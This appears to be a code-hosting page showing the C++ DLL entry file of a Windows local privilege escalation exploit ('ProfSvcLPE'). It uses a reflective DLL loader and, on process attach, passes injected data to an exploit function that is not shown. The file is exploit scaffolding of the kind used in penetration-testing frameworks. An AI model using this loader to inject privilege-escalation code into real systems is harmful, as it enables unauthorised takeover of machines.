Grant Willcox
45 lines
1.3 KiB
C++
45 lines
1.3 KiB
C++
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
#include "ReflectiveLoader.c"
|
|
|
|
#include <stdio.h>
|
|
#include <stdint.h>
|
|
#include <windows.h>
|
|
#include "ProfSvcLPE.h"
|
|
|
|
// Note we need to define this as an export. For the purpose of our code
|
|
// this can be a normal C++ export with standard name mangling
|
|
// but if we needed this to be C compatible
|
|
// we would just append "extern 'C'" to the front of this.
|
|
|
|
int main(char * incomingData) {
|
|
exploit(incomingData);
|
|
}
|
|
|
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
|
{
|
|
char* incomingData = (char*)lpReserved;
|
|
switch (dwReason)
|
|
{
|
|
case DLL_QUERY_HMODULE:
|
|
hAppInstance = hinstDLL;
|
|
if (lpReserved != NULL)
|
|
{
|
|
*(HMODULE*)lpReserved = hAppInstance;
|
|
}
|
|
break;
|
|
case DLL_PROCESS_ATTACH:
|
|
hAppInstance = hinstDLL;
|
|
main(incomingData); // Unfortunately for our purposes we can't call this function from DLLMain() otherwise we will hang.
|
|
//See https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain and https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-best-practices for more info
|
|
break;
|
|
case DLL_PROCESS_DETACH:
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
break;
|
|
}
|
|
return TRUE;
|
|
}
|
|
|
|
|